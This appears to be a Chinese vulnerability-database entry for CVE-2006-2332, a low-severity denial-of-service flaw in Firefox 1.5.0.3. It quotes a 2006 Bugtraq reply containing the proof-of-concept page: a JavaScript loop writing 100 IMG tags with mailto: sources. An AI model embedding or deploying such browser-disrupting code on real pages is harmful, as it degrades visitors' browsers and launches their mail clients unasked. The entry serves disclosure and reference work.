Mozilla Firefox SRC属性 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195044 漏洞类型 未知
发布时间 2006-05-11 更新时间 2006-05-11
CVE编号 CVE-2006-2332 CNNVD-ID CNNVD-200605-202
漏洞平台 N/A CVSS评分 2.6
|漏洞来源
https://www.securityfocus.com/bid/87628
https://cxsecurity.com/issue/WLB-2006050073
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-202
|漏洞详情
MozillaFirefox1.5.0.3可以使远程攻击者借助一个含有大量IMG元素,将其中的SRC属性邮寄给URI的网页,引起拒绝服务。
|漏洞EXP
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

p4.werterxyz (at) gmail (dot) com [email concealed] wrote:
> test2:
> http://werterxyz.altervista.org/test2.html
> http://geocities.com/werterxyz/test2.html

Did not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for
a few seconds and launched Outlook Express, but that's it).  Here is the
code since the original poster didn't see fit to publish it.

<Head>
<Title>test2 by P4</Title>
</Head>

<Body>
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE -->
<SCRIPT Language="Javascript">
for(i=0; i<100; i++){
document.write('<Img src="mailto:test (at) test (dot) com [email concealed]?subject=test
email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona
"Mostra immagine" (View Image)')
}
</SCRIPT>
</Body>
<!-- text below generated by server. PLEASE REMOVE
-
--></object></layer></div></span></style></noscript></table></script></a
pplet><script
language="JavaScript"
src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script
language="JavaScript"
src="http://geocities.com/js_source/geov2.js"></script><script
language="javascript">geovisit();</script><noscript><img
src="http://visit.geocities.yahoo.com/visit.gif?us1147288798"
alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61"
ALT=1 WIDTH=1 HEIGHT=1>

> 
> Saluti da P4

- --
Chris Horry KG4TSM      "A conservative is a man with two perfectly
zerbey (at) wibble.co (dot) uk [email concealed]      good legs who, however, has never learned how
http://www.wibble.co.uk  to walk forward".  -- Franklin D. Roosevelt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFEYj3pnAAeGCtMZU4RAuEAAJ92SdxcNR0ALLdqrC6/CgTOve8UXwCfRkgF
9DAmdMxX5LaboCYnYTtr4GM=
=z8eV
-----END PGP SIGNATURE-----
|受影响的产品
Mozilla Firefox 1.5.0.3
|参考资料

来源:BUGTRAQ
名称:20060510Re:Firefox1.5.0.3-DoS
链接:http://www.securityfocus.com/archive/1/archive/1/433568/100/0/threaded
来源:BUGTRAQ
名称:20060506Firefox1.5.0.3-DoS
链接:http://www.securityfocus.com/archive/1/archive/1/433534/100/0/threaded
来源:MISC
链接:http://www.securityview.org/confirmed-bug-in-firefox-1503.html
来源:BUGTRAQ
名称:20060513Re:Re:Firefox1.5.0.3-DoS
链接:http://www.securityfocus.com/archive/1/archive/1/433984/30/5010/threaded
来源:SREASON
名称:876
链接:http://securityreason.com/securityalert/876